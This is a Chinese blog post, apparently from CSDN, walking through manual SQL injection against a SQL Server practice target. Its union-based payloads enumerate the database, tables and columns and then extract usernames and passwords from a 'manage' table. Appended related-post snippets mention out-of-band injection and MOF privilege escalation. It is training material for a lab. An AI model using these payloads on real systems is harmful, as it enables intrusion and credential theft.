MMSQL手工注入-练习总结

最新推荐文章于 2024-07-10 17:22:06 发布
最新推荐文章于 2024-07-10 17:22:06 发布
阅读量95 收藏
点赞数
分类专栏: sql注入 随笔 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63082823/article/details/132352305
版权

MMSQL即sql-server,解法上跟mysql大体相似,语法不同,今天在墨者靶场练了下,新手问题还是蛮多的,在此总结和大家一起探讨提升。
在这里插入图片描述就是这个了,Let’s go!

one 判断是否为MMSQL注入:

and exists(select * from sysobjects)
or
and exists(select count(*) from sysobjects)
在这里插入图片描述
页面显示正常,更改id值为假时页面异常,则判断为MMSQL注入。

TWO 猜解字段长度

跟mysql一样是order by
在这里插入图片描述
在这里插入图片描述
慢慢试,发现值为5时异常,则判断字段数有4个。

Three 猜解回显的字段

mysql用的是1,2,3……,而MMSQL用的则是null,null,null……(null表示无论是数字形式还是字符形式)
在这里插入图片描述
在这里插入图片描述
通过将null改为数字或者字符(字符就是要带引号)来确定回显字段(当然也可以跳过上一步的null直接试,注意引号千万不要打错成中文的!!)

Four 获取数据库名db_name()

db_name():返回当前数据库库名 。
在这里插入图片描述

Five 获取数据库表名

?id=-2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype = 'u'),'3',null

dbo是每个数据库的默认用户,具有所有者权限,可省略(但是…不能省)
MMSQL没有limit,读取条数用top关键字
name就是表名信息,xtype是代表表的类型(值为u的时候进行搜索,只能是u/U,如果是其他的值并不能搜索出现)在这里插入图片描述

Six 获取列名

id=-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),'3',null

(col_name是系统函数,用法col_name(obj_id,col_id)),依次改变col_id的值得到想要的表。
在这里插入图片描述
在这里插入图片描述

Seven 获取数据

id=-2 union all select null,(select top 1 username from manage),(select top 1 password from manage),null

select top 1 username from manage查询manage表中的用户名username
select top 1 password from manage查询manage表中的密码password
在这里插入图片描述
最后将得到的密码解密出来就行啦~~
在这里插入图片描述

请君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSSQL注入手工注入mssql提权
代码审计
04-18 2217
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库,数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
封神台MSSQL注入 - 反弹注入
qq_40941912的博客
10-05 235
一、作业 MSSQL注入 - 反弹注入 (Rank: 5) 判断页面是否存在注入:’ and 1=2 – qwe.页面不正常 判断输出位个数:‘ order by 3 — qwe,3个输出位. 输出位输出: 错误原因:MSSQL对输出位数据很严格.应该: ‘ union select 5,null,null — qwe 正常,说明第一个输出字段为整数. ‘union select 5,’a’,’a’ — qwe 说明第2,3字段为字符串. 对MMSQL猜表名: MMSQL的自带数据
SQL注入漏洞-Mssql报错注入
HacHunter的博客
03-07 2085
Mssql即Sql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
MSSQL注入——反弹注入
m0_55854679的博客
02-18 900
文章目录MSSQL【SQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQL【SQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
SQL靶场练习总结
weixin_51884452的博客
11-08 610
sql注入总结
墨者 - SQL手工注入漏洞测试(Sql Server数据库)
吃肉唐僧的博客
07-03 1873
/new_list.asp?id=2 and 1=2 ,返回页面没报错 /new_list.asp?id=2 order by 1 ,测试有多少个字段,知道order by 4还有页面回显 这里有个坑,一开始走正常的流程测回显位置 /new_list.asp?id=2 and 1=2 union select 1,2,3,4 , 用 union select 连...
mysql mmsql 提权区别_MYSQL提权总结
weixin_42312523的博客
01-21 40
一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:方法 1: 运行 MOF 文件指...
mysql mmsql 提权区别_mysql 提权总结
weixin_42402188的博客
01-27 124
1.MOF提权简单的说mof就是系统内部的一个程序,每隔一定时间系统就会以root权限去执行,我们将其替换然后执行我们的而已攻击代码。此举称之为mof提权。以下便是脚本:1 #pragma namespace("\\\\.\\root\\subscription")23 instance of __EventFilter as$EventFilter4 {5 EventNamespace ...
SQL手工注入漏洞测试(Sql Server数据库)
qq_52718293的博客
12-02 474
1.判断注入类型(数字型) 2.判断字段数(4个) 3.判断回显(2和3) 这里要注意两个点 1.使用union all 2.字段三的位置是字符 4.爆库 (使用db_name()函数查询数据库) mozhe_db_v2 5.查看表名 xtype=‘u’ :查看用户表 mmsql和mysql语法有点不同,mmsql记录敏感信息的表在sysobjects 中 具体参数请了解以下链接了解: https://www.cnblogs.com/atree/p/SQL-Server-sysobjects
IIS服务器加MMSQL企业模板
09-19
【IIS服务器加MSSQL企业模板】是一个针对企业级应用设计的解决方案,结合了Internet Information Services (IIS) 和 Microsoft SQL Server (MSSQL) 的强大力量,为企业提供了一个稳定、高效且安全的Web服务环境。...
node-red-contrib-mssql-plus:读取和写入Microsoft MS SQL数据库的Node-RED节点
05-01
节点红色贡献mssql加一个节点,用于在Microsoft SQL Server和Azure数据库SQL2000〜SQL2019中执行查询和存储过程。 重要的是,此软件包附带了用于与Azure&MS SQL服务(使用TDS协议)进行通信的预建linux驱动程序,...
Aspx/Asp.net 防注入程序 V1.0
01-01
由于ASP.NET基本上配合MMSQL数据库架设 如果权限过大的话很容易被攻击. 再者在网络上找不到好的ASP.NET防注射脚本,所以就自己写了个. 在这里共享出来旨在让程序员免除SQL注入的困扰. 我写了两个版本,VB.NET和C#版本...
DB covent数据同步工具
10-11
DB covent 可以实现不同数据库之间的互相同步例如:mmsql--mysql,mysql--orcal等等都可以实现,此版本是破解版哦
StudentManage.zip
06-08
总结,这个C#学生管理系统展示了如何结合编程语言、GUI工具和数据库技术来实现一个实际的应用。它不仅加深了对C#和Windform的理解,也强化了数据库设计和管理的实践经验。无论是学习还是实际工作中,这样的项目都能...
SQL面试题练习 —— 各用户最长的连续登录天数-可间断
hu_wei123的博客
07-06 303
现要求统计各用户最长的连续登录天数,间断一天也算作连续,例如:一个用户在1,3,5,6登录,则视为连续6天登录。首先根据user_id和group_id分组,用datediff计算出出最大登陆日期和最小登陆日期,两者做差+1 得到每次连续登陆的天数。根据用户分组,使用lag函数获得当前行的上一行数据中的日期,使用datediff函数判断日期当期日期与上一行日期的时间差。根据date_diff结果判断是否连续,如果date_diff <= 2则认为连续 我们给赋值为0,否则不连续,赋值为1。
【postgresql】视图(View)
最新发布
一个写了10年bug的程序员日常笔记。
07-10 415
PostgreSQL 中的视图(View)是一种虚拟表,其内容由 SQL 查询定义。视图可以简化复杂的 SQL 操作,使得用户能够以一种更直观、更易于理解的方式来访问和操作数据。PostgreSQL 视图是只读的,因此可能无法在视图上执行 DELETE、INSERT 或 UPDATE 语句。但是可以在视图上创建一个触发器,当尝试 DELETE、INSERT 或 UPDATE 视图时触发,需要做的动作在触发器内容中定义。
创建数据库表的语法定义包含了SQL Server、Mysql、PostgreSQL、SQLite的示例
weixin_49816293的博客
07-03 986
在数据库设计中,创建表是基础且关键的一步。本文将详细介绍如何在不同数据库系统中使用数据定义语言(DDL)来定义表结构。
SQL-DQL
qq_59076775的博客
07-03 531
X表示前面有多少位无所谓,最后一位为X。五.DQL-聚合函数将一列数据作为一个整体,进行纵向计算。
Python 获取 SQL 指纹和 HASH 值
分享既学习
07-10 232
本文介绍一个提取 SQL 指纹的方法,就是将 SQL 语句的条件转换为?可用于脱敏和 SQL 聚类分析的场景。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值